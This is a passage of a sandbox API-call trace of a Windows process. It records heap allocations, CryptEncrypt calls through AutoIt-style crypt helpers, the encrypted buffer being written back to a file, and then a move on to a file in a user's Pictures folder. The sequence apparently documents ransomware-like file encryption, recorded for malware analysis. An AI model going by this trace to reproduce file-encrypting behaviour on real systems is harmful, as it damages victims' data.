| out: hHeap=0x1780000) returned 1 [0095.050] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0095.050] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f08 | out: hHeap=0x1780000) returned 1 [0095.050] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0095.050] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0095.050] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0095.050] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0095.050] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea2e0 [0095.050] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0095.050] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0095.050] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0095.050] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f48 [0095.050] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0095.050] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0095.050] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0095.050] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffe0 [0095.050] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0095.050] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0095.051] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2900 [0095.051] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0058 [0095.051] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0095.051] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2910 [0095.051] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0095.051] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0095.051] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0095.051] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdb0 [0095.051] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0095.051] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0095.051] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0095.051] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0095.051] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0095.051] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00a8 [0095.051] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0095.051] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0095.051] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0095.051] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0095.051] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27a0 [0095.051] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0148 [0095.051] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0095.052] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0095.052] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0095.052] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0095.052] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0095.052] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0095.052] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0170 [0095.052] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0095.052] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28d0 [0095.052] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0095.052] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0095.052] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28e0 [0095.052] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0095.052] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfea0 [0095.052] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0095.052] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca9d0 [0095.052] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0095.052] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0095.052] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0095.052] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2900 [0095.052] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391d20 [0095.052] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0095.052] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caa18 [0095.053] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9338 [0095.053] PeekMessageW (in: lpMsg=0x144e4dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e4dc) returned 0 [0095.053] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0095.053] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0095.053] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0095.053] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0095.053] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41abfc0 [0095.053] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0095.053] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2770 [0095.053] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391ee0 [0095.053] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0095.053] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caa18 [0095.053] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8be8 [0095.053] PeekMessageW (in: lpMsg=0x144e6a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e6a4) returned 0 [0095.053] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0095.053] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0095.053] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0095.053] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0095.053] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0095.053] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9c68 [0095.054] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2770 [0095.054] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41abfc0 [0095.054] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0095.054] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28e0 [0095.054] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0095.054] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0095.054] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac140 [0095.054] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0095.054] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0095.054] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff90 [0095.054] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0095.054] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2730 [0095.054] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0095.054] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391d20 [0095.054] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0095.054] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca868 [0095.054] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0095.054] PeekMessageW (in: lpMsg=0x144e4ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e4ec) returned 0 [0095.054] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28f0 [0095.054] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0095.054] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0095.054] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0095.055] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0095.055] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0095.055] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0095.055] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0095.055] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0095.055] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0095.055] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0095.055] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0095.055] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0095.055] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0095.055] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0095.055] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0095.055] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0095.055] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28e0 [0095.055] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0095.055] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0095.055] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0095.055] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9338 [0095.055] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0095.055] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2900 [0095.055] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0095.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0095.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0095.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0095.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0095.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0095.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0095.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0095.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0095.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0095.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0095.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0095.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0095.104] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0095.104] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0095.104] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00d0 [0095.104] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caad8 [0095.104] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0095.104] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0095.105] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18cd8) returned 0x49b2ce8 [0095.105] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0095.105] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0095.105] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28f0 [0095.105] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2900 [0095.105] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0095.105] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0095.105] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xd) returned 0x43cabf8 [0095.105] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cabf8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0095.105] CryptEncrypt (in: hKey=0x41ac780, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e538*=0x18cd8, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e538*=0x18ce0) returned 1 [0095.105] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0095.105] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea2e0 [0095.106] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0120 [0095.106] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0095.106] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0095.106] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0095.106] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0095.106] CharLowerBuffW (in: lpsz="byte[101601]", cchLength=0xc | out: lpsz="byte[101601]") returned 0xc [0095.106] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b48 [0095.106] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0095.106] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0095.106] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0095.106] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0095.106] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0095.106] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0095.106] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0095.106] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0095.109] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0095.109] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0095.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb030 [0095.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2770 [0095.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0095.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf40 [0095.109] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0095.109] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xd) returned 0x43cb078 [0095.109] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cb078, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0095.109] CryptEncrypt (in: hKey=0x41ac780, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x49b2ce8*, pdwDataLen=0x144e538*=0x18cd8, dwBufLen=0x18ce0 | out: pbData=0x49b2ce8*, pdwDataLen=0x144e538*=0x18ce0) returned 1 [0095.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0095.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43eada8 [0095.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01c0 [0095.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae08 [0095.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf40 [0095.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad90 [0095.110] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0095.110] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0095.110] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0095.166] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0095.168] WriteFile (in: hFile=0x258, lpBuffer=0x4516010*, nNumberOfBytesToWrite=0x18ce0, lpNumberOfBytesWritten=0x144ef3c, lpOverlapped=0x0 | out: lpBuffer=0x4516010*, lpNumberOfBytesWritten=0x144ef3c*=0x18ce0, lpOverlapped=0x0) returned 1 [0095.171] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0095.171] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0095.171] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0095.172] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0095.172] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0095.172] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0095.172] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0095.172] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0095.172] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0095.172] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43ca7a8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0095.172] CryptDestroyKey (hKey=0x41ac780) returned 1 [0095.172] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0095.172] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea730 [0095.172] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2730 [0095.172] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0095.172] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0095.172] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0095.172] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0095.172] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0095.172] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0095.172] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0095.173] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0095.173] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0095.173] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0095.173] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0095.173] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0095.173] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0095.173] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0095.173] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28d0 [0095.173] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0095.173] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0095.173] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0095.173] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796fc8 [0095.173] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1796fc8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0095.173] CryptReleaseContext (hProv=0x41a5360, dwFlags=0x0) returned 1 [0095.173] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0095.173] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e93c8 [0095.173] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca940 [0095.173] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0095.173] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0095.174] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0095.174] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0095.174] FreeLibrary (hLibModule=0x756e0000) returned 1 [0095.174] CloseHandle (hObject=0x298) returned 1 [0095.179] CloseHandle (hObject=0x258) returned 1 [0095.185] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\X0f8JSrsqtdBsB.png", nBufferLength=0x7fff, lpBuffer=0x143ef38, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\X0f8JSrsqtdBsB.png", lpFilePart=0x0) returned 0x32 [0095.185] 